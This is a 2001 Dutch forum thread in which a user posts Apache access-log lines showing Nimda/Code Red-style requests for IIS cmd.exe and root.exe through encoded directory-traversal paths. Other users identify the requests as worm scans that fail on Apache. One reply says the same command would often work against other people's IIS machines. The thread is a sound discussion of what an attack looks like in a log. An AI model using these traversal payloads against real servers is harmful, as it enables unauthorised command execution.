Vage access.log van Apache... poging tot hack??

Pagina: 1
Acties:
  • 81 views sinds 30-01-2008

  • lak
  • Registratie: November 2000
  • Laatst online: 06-01-2022
Ik zat vanmorgen te loeren richting mijn access.log en zag dit:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
62.60.62.154 - - [30/Oct/2001:13:01:24 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
62.60.62.154 - - [30/Oct/2001:13:01:32 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
62.60.62.154 - - [30/Oct/2001:13:01:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
62.60.62.154 - - [30/Oct/2001:13:01:51 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
62.60.62.154 - - [30/Oct/2001:13:02:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
62.60.62.154 - - [30/Oct/2001:13:02:10 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
62.60.62.154 - - [30/Oct/2001:13:02:16 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
62.60.62.154 - - [30/Oct/2001:13:02:21 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
62.60.62.154 - - [30/Oct/2001:13:02:26 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
62.60.62.154 - - [30/Oct/2001:13:02:30 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
62.60.62.154 - - [30/Oct/2001:13:02:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
62.60.62.154 - - [30/Oct/2001:13:02:38 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
62.60.62.154 - - [30/Oct/2001:13:02:41 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
62.60.62.154 - - [30/Oct/2001:13:02:44 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
62.60.62.154 - - [30/Oct/2001:13:02:47 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
62.60.62.154 - - [30/Oct/2001:13:02:50 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

Wat is dit?? Poging tot hacken??

Edit: Of is dit een poging om cmd op te starten?? Lijkt mij dat die lamers denken dat dit een IIS server is ofso... Ben wel dom maar nie zo dom :)

SysSpec


  • WarPuppy
  • Registratie: Januari 2000
  • Laatst online: 04-05 11:01

WarPuppy

Electronic Technology

Das een IIS bug, die ze willen uitvoeren op Apache >:)

  • lak
  • Registratie: November 2000
  • Laatst online: 06-01-2022
En dat gaat neem ik aan nie werken toch??

SysSpec


  • jep
  • Registratie: November 2000
  • Laatst online: 05-05 11:28

jep

Niet echt nee ;)

  • Zorg
  • Registratie: Maart 2001
  • Laatst online: 19:48
kan iemand ook uitleggen wat ze aan het doen zijn dan? (in globale lijnen, nix illegaals)

Mijn hobby projectjes: www.agenticprojects.be


  • Bigs
  • Registratie: Mei 2000
  • Niet online
Ze proberen idd wat IIS exploits uit.. sukkels :)

  • MikeN
  • Registratie: April 2001
  • Laatst online: 05-05 12:25
[search=cmd apache]
Tis maar een idee...

  • Eastern
  • Registratie: Augustus 2000
  • Laatst online: 23-04 13:06
Bij ons is dat ook. Ik denk dat er veel mensen zijn die 'computer maniak' denken te zijn, en vervolgens w2k installeren met IIS4 of 5. Moet je maar eens proberen zo'n commando bij zo'n gast (op z'n ip nummer) uit te voeren. 80% kans dat het werkt...

Verwijderd

dat is nou nimda... die heb ik elke dag 2309847329 keer in m'n log staan. Irrittant kan ik je melden.

Verwijderd

Ja dat zijn virus aanvallen... zoals Codered en of Nimda of andere.

Ik heb hier een ermm soort stats grabber uit de accesslog files.

http://darkstar.phlex.net/virus/

  • bekkel
  • Registratie: Augustus 2000
  • Laatst online: 17-09-2025

bekkel

BoEsm Productions

Op dinsdag 30 oktober 2001 18:49 schreef shorty151 het volgende:
dat is nou nimda... die heb ik elke dag 2309847329 keer in m'n log staan. Irrittant kan ik je melden.
das wel erg vaak....
heb er een paar per dag (ip's)
met een regeltje of 15

.........www.raketje.com....................soon.....


  • MikeN
  • Registratie: April 2001
  • Laatst online: 05-05 12:25
denk ook niet dat het serieus was hoor.....

  • Eastern
  • Registratie: Augustus 2000
  • Laatst online: 23-04 13:06
denk ook niet dat het serieus was hoor.....
Als het wel serieus is heet dat DOS of DDOS ;)

  • Mark
  • Registratie: Juni 1999
  • Laatst online: 21:45
Onder welke steen kom jij vandaan ???

  • ACM
  • Registratie: Januari 2000
  • Niet online

ACM

Software Architect

Werkt hier

zoveelste nimda topic
Pagina: 1

Dit topic is gesloten.